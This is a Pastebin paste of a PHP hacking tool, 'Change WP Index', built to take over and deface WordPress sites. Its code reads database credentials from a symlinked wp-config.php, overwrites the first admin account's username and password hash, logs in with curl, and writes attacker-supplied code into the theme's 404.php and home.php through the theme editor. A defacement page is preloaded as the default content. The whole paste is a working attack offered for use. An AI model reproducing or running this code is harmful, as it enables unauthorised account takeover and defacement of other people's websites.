Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- ###########################################
- # Change WP Index #
- # Coded By xr00tx #
- # crash.burn@hackermail.com #
- # #
- ###########################################
- if($_POST['form_action'] == 1 )
- {
- $text=file_get_contents($_POST['file']);
- $username=entre2v2($text,"define('DB_USER', '","');");
- $password=entre2v2($text,"define('DB_PASSWORD', '","');");
- $dbname=entre2v2($text,"define('DB_NAME', '","');");
- $prefix=entre2v2($text,"$table_prefix = '","'");
- }
- if($_POST['form_action'] == 2 )
- {
- $prefix=($_POST['db_prefix']);
- $username=($_POST['db_username']);
- $password=($_POST['db_password']);
- $dbname=($_POST['db_name']);
- }
- /*
- echo($username);
- echo("<br>");
- echo($password);
- echo("<br>");
- echo($dbname);
- echo("<br>");
- echo($prefix);
- echo("<br>");
- */
- if ($_POST['form_action'])
- {
- $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";
- $link=mysql_connect("localhost",$username,$password) ;
- if ($link) {
- mysql_select_db($dbname,$link) ;
- $req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'raka',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `wp_users`.`ID` =1 LIMIT 1 ;");
- echo("<br>[+] Changing raka password to 123456789");
- $req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
- $data = mysql_fetch_array($req);
- $site_url=$data["option_value"];
- echo("<br>");
- echo($data["option_value"]);echo("/wp-login.php");
- }
- $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
- $url2=$site_url."/wp-login.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"log=raka&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"admin");
- if($pos === false) {
- echo("<br>[-] Login Error");
- exit;
- }
- else {
- echo("<br>[+] Login Successful");
- }
- echo("<br>[*] Theme editor ...");
- $url2=$site_url."/wp-admin/theme-editor.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- $ar=explode( '<li><a href="theme-editor.php?file=', $buffer);
- for($vi=0;$vi < count($ar);$vi++)
- {
- if(substr_count($ar[$vi],"(404.php)") != 0){
- $theme=entre2v2($ar[$vi],'/themes','">');
- // echo(entre2v2($ar[$vi],'/themes','">'));
- }
- }
- if($theme) {
- echo("<br>[+] 404.php file founded in Theme Editor");
- }
- else {
- echo("<br>[-] 404.php Not found in Theme Editor");
- exit;
- }
- echo("<br>[*] Updating 404.php .....");
- //-----------------------------------------------------\\
- $theme=str_replace("&","&",$theme);
- $url2=trim($site_url."/wp-admin/theme-editor.php?file=/themes".$theme);
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer0 = curl_exec($ch);
- //echo($buffer0);
- $_wpnonce=entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
- $_file=entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
- $url2=$site_url."/wp-admin/theme-editor.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$h."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- //echo($buffer);
- $pos = strpos($buffer,'<div id="message" class="updated">');
- if($pos === false) {
- echo("<br>[-] Updating 404.php Error");
- exit;
- }
- else {
- echo("<br>[+] 404.php Updated Successfuly");
- }
- //////////////////////////////
- $ar=explode( '<li><a href="theme-editor.php?file=', $buffer);
- for($vi=0;$vi < count($ar);$vi++)
- {
- if(substr_count($ar[$vi],"(home.php)") != 0){
- $theme=entre2v2($ar[$vi],'/themes','">');
- // echo(entre2v2($ar[$vi],'/themes','">'));
- }
- }
- if($theme) {
- echo("<br>[+] home.php file founded in Theme Editor");
- }
- else {
- echo("<br>[-] home.php Not found in Theme Editor");
- exit;
- }
- echo("<br>[*] Updating home.php .....");
- //-----------------------------------------------------\\
- $theme=str_replace("&","&",$theme);
- $url2=trim($site_url."/wp-admin/theme-editor.php?file=/themes".$theme);
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer0 = curl_exec($ch);
- //echo($buffer0);
- $_wpnonce=entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
- $_file=entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
- $url2=$site_url."/wp-admin/theme-editor.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url2);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$h."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- $buffer = curl_exec($ch);
- //echo($buffer);
- $pos = strpos($buffer,'<div id="message" class="updated">');
- if($pos === false) {
- echo("<br>[-] Updating home.php Error");
- exit;
- }
- else {
- echo("<br>[+] home.php Updated Successfuly");
- }
- }
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
- {
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[1]);
- $ar=trim($ar1[0]);
- return $ar;
- }
- ?>
- <title>Change WP Index Coded By RAB3OUN</title>
- <body bgcolor="#000000">
- <style>
- BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive; color: white;}
- textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}
- input{FONT-WEIGHT:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: Tahoma; border: 1px solid #666666;height:17}
- </style>
- <center>
- <font color="#FFFF6FF" size='+3'>[ ~~ Change WP Index ~~ ]</font><br><br>
- <font color="#0066FF" size='+2'>Symlink to wp-config.php of WP</font><br>
- </center>
- Symlink to wp-config.php of WP
- <br>
- <FORM action="" method="post">
- <input type="hidden" name="form_action" value="1">
- <br>
- <input type="text" size="30" name="file" value="">
- <br>
- <br>
- Index Code
- <br>
- <TEXTAREA rows="18" cols="50" name="code">
- </TEXTAREA>
- <br>
- <INPUT class=submit type="submit" value="Submit" name="Submit">
- </FORM>
- <hr>
- <br>
- <center>
- <font color="#0066FF" size='+2'>DB configuration of WP<font><br>
- </center>
- <FORM action="" method="post">
- <input type="hidden" name="form_action" value="2">
- <br>
- <table border=1>
- <tr><td>db_prefix </td><td><input type="text" size="30" name="db_prefix" value="wp_"></td></tr>
- <tr><td>db_username </td><td><input type="text" size="30" name="db_username" value=""></td></tr>
- <tr><td>db_password</td><td><input type="text" size="30" name="db_password" value=""></td></tr>
- <tr><td>db_name</td><td><input type="text" size="30" name="db_name" value=""></td></tr>
- </table>
- <br>
- <br>
- <TEXTAREA rows="18" cols="50" name="code"><html><head></head><body><font color="#000000" face="Copperplate Gothic Light" size="5"><b>HaCkeD bY Mang_Aj0<b></font><br>
- <FONT face="Agency Fb" size="4" color="#ff0000"><b>: sund4nyMOuz | all indonesian defacer<b></font><br>
- <font face="Agency Fb" size="3" color="#000000"><b>-= © 2012 by : sund4nyM0uz =-<b></font><br>
- <font face="Agency Fb" size="3" color="#ffffff"><b>-= by : sund4nyM0uz =-<b></font><br>
- </TEXTAREA>
- <br>
- <INPUT class=submit type="submit" value="Submit" name="Submit">
- </FORM>
- <hr>
Add Comment
Please, Sign In to add comment